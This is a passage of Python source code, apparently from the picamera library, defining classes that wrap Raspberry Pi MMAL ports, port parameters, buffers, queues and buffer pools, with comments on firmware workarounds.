mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_NV21,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
],
'vc.ril.image_encode:in:0': [
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
],
'vc.ril.image_encode:out:0': [
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_PPM,
mmal.MMAL_ENCODING_TGA,
],
'vc.ril.resize:in:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# several invalid encodings (lowercase versions of the priors)
# appear here in modern firmwares but since they don't map to any
# constants they're excluded
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.resize:out:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# same invalid encodings as above here
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.isp:in:0': [
mmal.MMAL_ENCODING_BAYER_SBGGR8,
mmal.MMAL_ENCODING_BAYER_SBGGR10DPCM8,
mmal.MMAL_ENCODING_BAYER_SBGGR10P,
mmal.MMAL_ENCODING_BAYER_SBGGR12P,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.ril.isp:out:0': [
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.null_sink:in:0': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
],
}
def __init__(self, port, opaque_subformat='OPQV'):
super(MMALPort, self).__init__(port)
self.opaque_subformat = opaque_subformat
self._pool = None
self._stopped = True
self._connection = None
def __repr__(self):
if self._port is not None:
return '<MMALPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self.buffer_count, self.buffer_size)
else:
return '<MMALPort closed>'
def _get_opaque_subformat(self):
return self._opaque_subformat
def _set_opaque_subformat(self, value):
self._opaque_subformat = value
opaque_subformat = property(
_get_opaque_subformat, _set_opaque_subformat, doc="""\
Retrieves or sets the opaque sub-format that the port speaks. While
most formats (I420, RGBA, etc.) mean one thing, the opaque format is
special; different ports produce different sorts of data when
configured for OPQV format. This property stores a string which
uniquely identifies what the associated port means for OPQV format.
If the port does not support opaque format at all, set this property to
``None``.
:class:`MMALConnection` uses this information when negotiating formats
for a connection between two ports.
""")
def _get_format(self):
result = self._port[0].format[0].encoding
if FIX_RGB_BGR_ORDER:
return {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(result, result)
else:
return result
def _set_format(self, value):
if FIX_RGB_BGR_ORDER:
value = {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(value, value)
self._port[0].format[0].encoding = value
if value == mmal.MMAL_ENCODING_OPAQUE:
self._port[0].format[0].encoding_variant = mmal.MMAL_ENCODING_I420
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
After setting this attribute, call :meth:`commit` to make the changes
effective.
""")
@property
def supported_formats(self):
"""
Retrieves a sequence of supported encodings on this port.
"""
try:
mp = self.params[mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS]
except PiCameraMMALError as e:
if e.status in (mmal.MMAL_EINVAL, mmal.MMAL_ENOSYS):
# Workaround: old firmwares raise EINVAL or ENOSYS when various
# ports are queried for supported formats. The following is the
# correct sequence for old firmwares (note: swapped RGB24 and
# BGR24 order in still port) ... probably (vc.ril.camera:out:2
# is definitely right, the rest are largely guessed based on
# queries of later firmwares)
try:
return MMALPort._supported_formats_patch[self.name]
except KeyError:
raise e
else:
raise
else:
result = [
v for v in mp.encoding if v != 0
][:mp.hdr.size // ct.sizeof(ct.c_uint32)]
# Workaround: Fix incorrect result on MMALImageEncoder.outputs[0]
# from modern firmwares
if self.name == 'vc.ril.image_encode:out:0' and result == [
mmal.MMAL_ENCODING_MP2V, mmal.MMAL_ENCODING_MP2V,
mmal.MMAL_ENCODING_H264, mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_VP7, mmal.MMAL_ENCODING_VP7,
mmal.MMAL_ENCODING_VP6, mmal.MMAL_ENCODING_VP6]:
return MMALPort._supported_formats_patch[self.name]
else:
return result
def _get_bitrate(self):
return self._port[0].format[0].bitrate
def _set_bitrate(self, value):
self._port[0].format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._port[0].format, source._format)
else:
mmal.mmal_format_copy(self._port[0].format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers according to the recommendations of the
MMAL library. This is typically called after adjusting the port's
format and/or associated settings (like width and height for video
ports).
"""
mmal_check(
mmal.mmal_port_format_commit(self._port),
prefix="Format couldn't be set on port %s" % self.name)
# Workaround: Unfortunately, there is an upstream issue with the
# buffer_num_recommended which means it can't currently be used (see
# discussion in raspberrypi/userland#167). There's another upstream
# issue with buffer_num_min which means we need to guard against 0
# values...
self._port[0].buffer_num = max(1, self._port[0].buffer_num_min)
self._port[0].buffer_size = (
self._port[0].buffer_size_recommended
if self._port[0].buffer_size_recommended > 0 else
self._port[0].buffer_size_min)
@property
def pool(self):
"""
Returns the :class:`MMALPool` associated with the buffer, if any.
"""
return self._pool
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self.enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
return self.pool.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
isinstance(self._connection, MMALPythonConnection) and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
return
else:
buf = modified_buf
try:
mmal_check(
mmal.mmal_port_send_buffer(self._port, buf._buf),
prefix="cannot send buffer to port %s" % self.name)
except PiCameraMMALError as e:
# If port is disabled, convert exception for convenience
if e.status == mmal.MMAL_EINVAL and not self.enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
else:
raise
def flush(self):
"""
Flush the port.
"""
mmal_check(
mmal.mmal_port_flush(self._port),
prefix="Unable to flush port %s" % self.name)
def _get_buffer_count(self):
return self._port[0].buffer_num
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._port[0].buffer_num = value
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port.
The ``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def _get_buffer_size(self):
return self._port[0].buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._port[0].buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers is typically dictated by the port's format. The
``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. The callback should return ``True`` when processing is
complete and no further calls are expected (e.g. at frame-end for an
image encoder), and ``False`` otherwise.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
if not self._stopped and callback(self, buf):
self._stopped = True
finally:
buf.release()
try:
self._pool.send_buffer(block=False)
except PiCameraPortDisabled:
# The port was disabled, no point trying again
pass
# Workaround: There is a bug in the MJPEG encoder that causes a
# deadlock if the FIFO is full on shutdown. Increasing the encoder
# buffer size makes this less likely to happen. See
# raspberrypi/userland#208. Connecting the encoder component resets the
# output port's buffer size, hence why we correct this here, just
# before enabling the port.
if self._port[0].format[0].encoding == mmal.MMAL_ENCODING_MJPEG:
self._port[0].buffer_size = max(512 * 1024, self._port[0].buffer_size_recommended)
if callback:
assert self._stopped
assert self._pool is None
self._stopped = False
self._pool = MMALPortPool(self)
try:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
# If this port is an output port, send it all the buffers
# in the pool. If it's an input port, don't bother: the user
# will presumably want to feed buffers to it manually
if self._port[0].type == mmal.MMAL_PORT_TYPE_OUTPUT:
self._pool.send_all_buffers(block=False)
except:
self._pool.close()
self._pool = None
self._stopped = True
raise
else:
super(MMALPort, self).enable()
def disable(self):
"""
Disable the port.
"""
self._stopped = True
super(MMALPort, self).disable()
if self._pool is not None:
self._pool.close()
self._pool = None
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection *options* can be specified as keyword arguments.
These will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
if isinstance(other, MMALPythonPort):
return MMALPythonConnection(self, other, **options)
else:
return MMALConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALVideoPort(MMALPort):
"""
Represents an MMAL port used to pass video data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return (
'<MMALVideoPort "%s": format=MMAL_FOURCC("%s") buffers=%dx%d '
'frames=%s@%sfps colorspace=MMAL_FOURCC("%s")>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size,
self.framesize, self.framerate,
mmal.FOURCC_str(self.colorspace)))
else:
return '<MMALVideoPort closed>'
def _get_framesize(self):
return PiResolution(
self._port[0].format[0].es[0].video.crop.width,
self._port[0].format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._port[0].format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = value.width
video.crop.height = value.height
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the port's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
def _get_framerate(self):
video = self._port[0].format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
assert video.frame_rate.num == 0
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._port[0].format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
def _get_colorspace(self):
return self._port[0].format[0].es[0].video.color_space
def _set_colorspace(self, value):
self._port[0].format[0].es[0].video.color_space = value
colorspace = property(_get_colorspace, _set_colorspace, doc="""\
Retrieves or sets the color-space of the port's frames.
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
class MMALAudioPort(MMALPort):
"""
Represents an MMAL port used to pass audio data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALAudioPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALAudioPort closed>'
class MMALSubPicturePort(MMALPort):
"""
Represents an MMAL port used to pass sub-picture (caption) data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALSubPicturePort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALSubPicturePort closed>'
class MMALPortParams(object):
"""
Represents the parameters of an MMAL port. This class implements the
:attr:`MMALControlPort.params` attribute.
Internally, the class understands how to convert certain structures to more
common Python data-types. For example, parameters that expect an
MMAL_RATIONAL_T type will return and accept Python's
:class:`~fractions.Fraction` class (or any other numeric types), while
parameters that expect an MMAL_BOOL_T type will treat anything as a truthy
value. Parameters that expect the MMAL_PARAMETER_STRING_T structure will be
treated as plain strings, and likewise MMAL_PARAMETER_INT32_T and similar
structures will be treated as plain ints.
Parameters that expect more complex structures will return and expect
those structures verbatim.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPortParams, self).__init__()
self._port = port
def __getitem__(self, key):
dtype = PARAM_TYPES[key]
# Use the short-cut functions where possible (teeny bit faster if we
# get some C to do the structure wrapping for us)
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_get_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_get_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_get_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_get_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_get_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_get_uint64,
}.get(dtype, mmal.mmal_port_parameter_get)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: Fraction(v.num, v.den),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: v.value != mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_INT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_INT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.str.decode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_get:
result = dtype(
mmal.MMAL_PARAMETER_HEADER_T(key, ct.sizeof(dtype))
)
mmal_check(
func(self._port, result.hdr),
prefix="Failed to get parameter %d" % key)
else:
dtype = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.MMAL_RATIONAL_T,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.MMAL_BOOL_T,
mmal.MMAL_PARAMETER_INT32_T: ct.c_int32,
mmal.MMAL_PARAMETER_INT64_T: ct.c_int64,
mmal.MMAL_PARAMETER_UINT32_T: ct.c_uint32,
mmal.MMAL_PARAMETER_UINT64_T: ct.c_uint64,
}[dtype]
result = dtype()
mmal_check(
func(self._port, key, result),
prefix="Failed to get parameter %d" % key)
return conv(result)
def __setitem__(self, key, value):
dtype = PARAM_TYPES[key]
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_set_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_set_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_set_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_set_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_set_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_set_uint64,
mmal.MMAL_PARAMETER_STRING_T: mmal.mmal_port_parameter_set_string,
}.get(dtype, mmal.mmal_port_parameter_set)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: to_rational(v),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: mmal.MMAL_TRUE if v else mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.encode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_set:
mp = conv(value)
assert mp.hdr.id == key
assert mp.hdr.size >= ct.sizeof(dtype)
mmal_check(
func(self._port, mp.hdr),
prefix="Failed to set parameter %d to %r" % (key, value))
else:
mmal_check(
func(self._port, key, conv(value)),
prefix="Failed to set parameter %d to %r" % (key, value))
class MMALBuffer(object):
"""
Represents an MMAL buffer header. This is usually constructed from the
buffer header pointer and is largely supplied to make working with
the buffer's data a bit simpler. Using the buffer as a context manager
implicitly locks the buffer's memory and returns the :mod:`ctypes`
buffer object itself::
def callback(port, buf):
with buf as data:
# data is a ctypes uint8 array with size entries
print(len(data))
Alternatively you can use the :attr:`data` property directly, which returns
and modifies the buffer's data as a :class:`bytes` object (note this is
generally slower than using the buffer object unless you are simply
replacing the entire buffer)::
def callback(port, buf):
# the buffer contents as a byte-string
print(buf.data)
"""
__slots__ = ('_buf',)
def __init__(self, buf):
super(MMALBuffer, self).__init__()
self._buf = buf
def _get_command(self):
return self._buf[0].cmd
def _set_command(self, value):
self._buf[0].cmd = value
command = property(_get_command, _set_command, doc="""\
The command set in the buffer's meta-data. This is usually 0 for
buffers returned by an encoder; typically this is only used by buffers
sent to the callback of a control port.
""")
def _get_flags(self):
return self._buf[0].flags
def _set_flags(self, value):
self._buf[0].flags = value
flags = property(_get_flags, _set_flags, doc="""\
The flags set in the buffer's meta-data, returned as a bitmapped
integer. Typical flags include:
* ``MMAL_BUFFER_HEADER_FLAG_EOS`` -- end of stream
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_START`` -- start of frame data
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_END`` -- end of frame data
* ``MMAL_BUFFER_HEADER_FLAG_KEYFRAME`` -- frame is a key-frame
* ``MMAL_BUFFER_HEADER_FLAG_FRAME`` -- frame data
* ``MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO`` -- motion estimatation data
""")
def _get_pts(self):
return self._buf[0].pts
def _set_pts(self, value):
self._buf[0].pts = value
pts = property(_get_pts, _set_pts, doc="""\
The presentation timestamp (PTS) of the buffer, as an integer number
of microseconds or ``MMAL_TIME_UNKNOWN``.
""")
def _get_dts(self):
return self._buf[0].dts
def _set_dts(self, value):
self._buf[0].dts = value
dts = property(_get_dts, _set_dts, doc="""\
The decoding timestamp (DTS) of the buffer, as an integer number of
microseconds or ``MMAL_TIME_UNKNOWN``.
""")
@property
def size(self):
"""
Returns the length of the buffer's data area in bytes. This will be
greater than or equal to :attr:`length` and is fixed in value.
"""
return self._buf[0].alloc_size
def _get_offset(self):
return self._buf[0].offset
def _set_offset(self, value):
assert 0 <= value <= self.size
self._buf[0].offset = value
self.length = min(self.size - self.offset, self.length)
offset = property(_get_offset, _set_offset, doc="""\
The offset from the start of the buffer at which the data actually
begins. Defaults to 0. If this is set to a value which would force the
current :attr:`length` off the end of the buffer's :attr:`size`, then
:attr:`length` will be decreased automatically.
""")
def _get_length(self):
return self._buf[0].length
def _set_length(self, value):
assert 0 <= value <= self.size - self.offset
self._buf[0].length = value
length = property(_get_length, _set_length, doc="""\
The length of data held in the buffer. Must be less than or equal to
the allocated size of data held in :attr:`size` minus the data
:attr:`offset`. This attribute can be used to effectively blank the
buffer by setting it to zero.
""")
def _get_data(self):
with self as buf:
return ct.string_at(
ct.byref(buf, self._buf[0].offset),
self._buf[0].length)
def _set_data(self, value):
value_len = buffer_bytes(value)
if value_len:
if value_len > self.size:
raise PiCameraValueError(
'data is too large for buffer (%d > %d)' % (
value_len, self.size))
bp = ct.c_uint8 * value_len
try:
sp = bp.from_buffer(value)
except TypeError:
sp = bp.from_buffer_copy(value)
with self as buf:
ct.memmove(buf, sp, value_len)
self._buf[0].offset = 0
self._buf[0].length = value_len
data = property(_get_data, _set_data, doc="""\
The data held in the buffer as a :class:`bytes` string. You can set
this attribute to modify the data in the buffer. Acceptable values
are anything that supports the buffer protocol, and which contains
:attr:`size` bytes or less. Setting this attribute implicitly modifies
the :attr:`length` attribute to the length of the specified value and
sets :attr:`offset` to zero.
.. note::
Accessing a buffer's data via this attribute is relatively slow
(as it copies the buffer's data to/from Python objects). See the
:class:`MMALBuffer` documentation for details of a faster (but
more complex) method.
""")
def replicate(self, source):
"""
Replicates the *source* :class:`MMALBuffer`. This copies all fields
from the *source* buffer, including the internal :attr:`data` pointer.
In other words, after replication this buffer and the *source* buffer
will share the same block of memory for *data*.
The *source* buffer will also be referenced internally by this buffer
and will only be recycled once this buffer is released.
.. note::
This is fundamentally different to the operation of the
:meth:`copy_from` method. It is much faster, but imposes the burden
that two buffers now share data (the *source* cannot be released
until the replicant has been released).
"""
mmal_check(
mmal.mmal_buffer_header_replicate(self._buf, source._buf),
prefix='unable to replicate buffer')
def copy_from(self, source):
"""
Copies all fields (including data) from the *source*
:class:`MMALBuffer`. This buffer must have sufficient :attr:`size` to
store :attr:`length` bytes from the *source* buffer. This method
implicitly sets :attr:`offset` to zero, and :attr:`length` to the
number of bytes copied.
.. note::
This is fundamentally different to the operation of the
:meth:`replicate` method. It is much slower, but afterward the
copied buffer is entirely independent of the *source*.
"""
assert self.size >= source.length
source_len = source._buf[0].length
if source_len:
with self as target_buf, source as source_buf:
ct.memmove(target_buf, ct.byref(source_buf, source.offset), source_len)
self._buf[0].offset = 0
self._buf[0].length = source_len
self.copy_meta(source)
def copy_meta(self, source):
"""
Copy meta-data from the *source* :class:`MMALBuffer`; specifically this
copies all buffer fields with the exception of :attr:`data`,
:attr:`length` and :attr:`offset`.
"""
self._buf[0].cmd = source._buf[0].cmd
self._buf[0].flags = source._buf[0].flags
self._buf[0].dts = source._buf[0].dts
self._buf[0].pts = source._buf[0].pts
self._buf[0].type[0] = source._buf[0].type[0]
def acquire(self):
"""
Acquire a reference to the buffer. This will prevent the buffer from
being recycled until :meth:`release` is called. This method can be
called multiple times in which case an equivalent number of calls
to :meth:`release` must be made before the buffer will actually be
released.
"""
mmal.mmal_buffer_header_acquire(self._buf)
def release(self):
"""
Release a reference to the buffer. This is the opposing call to
:meth:`acquire`. Once all references have been released, the buffer
will be recycled.
"""
mmal.mmal_buffer_header_release(self._buf)
def reset(self):
"""
Resets all buffer header fields to default values.
"""
mmal.mmal_buffer_header_reset(self._buf)
def __enter__(self):
mmal_check(
mmal.mmal_buffer_header_mem_lock(self._buf),
prefix='unable to lock buffer header memory')
return ct.cast(
self._buf[0].data,
ct.POINTER(ct.c_uint8 * self._buf[0].alloc_size)).contents
def __exit__(self, *exc):
mmal.mmal_buffer_header_mem_unlock(self._buf)
return False
def __repr__(self):
if self._buf is not None:
return '<MMALBuffer object: flags=%s command=%s length=%d>' % (
''.join((
'S' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_START else '_',
'E' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END else '_',
'K' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_KEYFRAME else '_',
'C' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CONFIG else '_',
'M' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO else '_',
'X' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_EOS else '_',
)), {
0: 'none',
mmal.MMAL_EVENT_ERROR: 'error',
mmal.MMAL_EVENT_FORMAT_CHANGED: 'format-change',
mmal.MMAL_EVENT_PARAMETER_CHANGED: 'param-change',
mmal.MMAL_EVENT_EOS: 'end-of-stream',
}[self.command], self.length)
else:
return '<MMALBuffer object: ???>'
class MMALQueue(object):
"""
Represents an MMAL buffer queue. Buffers can be added to the queue with the
:meth:`put` method, and retrieved from the queue (with optional wait
timeout) with the :meth:`get` method.
"""
__slots__ = ('_queue', '_created')
def __init__(self, queue):
self._created = False
self._queue = queue
@classmethod
def create(cls):
self = cls(mmal.mmal_queue_create())
self._created = True
return self
def close(self):
if self._created:
mmal_queue_destroy(self._queue)
self._queue = None
def __len__(self):
return mmal.mmal_queue_length(self._queue)
def get(self, block=True, timeout=None):
"""
Get the next buffer from the queue. If *block* is ``True`` (the default)
and *timeout* is ``None`` (the default) then the method will block
until a buffer is available. Otherwise *timeout* is the maximum time to
wait (in seconds) for a buffer to become available. If a buffer is not
available before the timeout expires, the method returns ``None``.
Likewise, if *block* is ``False`` and no buffer is immediately
available then ``None`` is returned.
"""
if block and timeout is None:
buf = mmal.mmal_queue_wait(self._queue)
elif block and timeout is not None:
buf = mmal.mmal_queue_timedwait(self._queue, int(timeout * 1000))
else:
buf = mmal.mmal_queue_get(self._queue)
if buf:
return MMALBuffer(buf)
def put(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the back of the queue.
"""
mmal.mmal_queue_put(self._queue, buf._buf)
def put_back(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the front of the queue. This is
used when a buffer was removed from the queue but needs to be put
back at the front where it was originally taken from.
"""
mmal.mmal_queue_put_back(self._queue, buf._buf)
class MMALPool(object):
"""
Represents an MMAL pool containing :class:`MMALBuffer` objects. All active
ports are associated with a pool of buffers, and a queue. Instances can be
treated as a sequence of :class:`MMALBuffer` objects but this is only
recommended for debugging purposes; otherwise, use the :meth:`get_buffer`,
:meth:`send_buffer`, and :meth:`send_all_buffers` methods which work with
the encapsulated :class:`MMALQueue`.
"""
__slots__ = ('_pool', '_queue')
def __init__(self, pool):
self._pool = pool
super(MMALPool, self).__init__()
self._queue = MMALQueue(pool[0].queue)
def __len__(self):
return self._pool[0].headers_num
def __getitem__(self, index):
return MMALBuffer(self._pool[0].header[index])
@property
def queue(self):
"""
The :class:`MMALQueue` associated with the pool.
"""
return self._queue
def close(self):
if self._pool is not None:
mmal.mmal_pool_destroy(self._pool)
self._pool = None
def resize(self, new_count, new_size):
"""
Resizes the pool to contain *new_count* buffers with *new_size* bytes
allocated to each buffer.
*new_count* must be 1 or more (you cannot resize a pool to contain
no headers). However, *new_size* can be 0 which causes all payload
buffers to be released.
.. warning::
If the pool is associated with a port, the port must be disabled
when resizing the pool.
"""
mmal_check(
mmal.mmal_pool_resize(self._pool, new_count, new_size),
prefix='unable to resize pool')
def get_buffer(self, block=True, timeout=None):
"""
Get the next buffer from the pool's queue. See :meth:`MMALQueue.get`
for the meaning of the parameters.
"""
return self._queue.get(block, timeout)
def send_buffer(self, port, block=True, timeout=None):
"""
Get a buffer from the pool's queue and send it to *port*. *block* and
*timeout* act as they do in :meth:`get_buffer`. If no buffer is
available (for the values of *block* and *timeout*,
:exc:`~picamera.PiCameraMMALError` is raised).
"""
buf = self.get_buffer(block, timeout)
if buf is None:
raise PiCameraMMALError(mmal.MMAL_EAGAIN, 'no buffers available')
port.send_buffer(buf)
def send_all_buffers(self, port, block=True, timeout=None):
"""
Send all buffers from the queue to *port*. *block* and *timeout* act as
they do in :meth:`get_buffer`. If no buffer is available (for the
values of *block* and *timeout*, :exc:`~picamera.PiCameraMMALError` is
raised).
"""
for i in range(len(self._queue)):
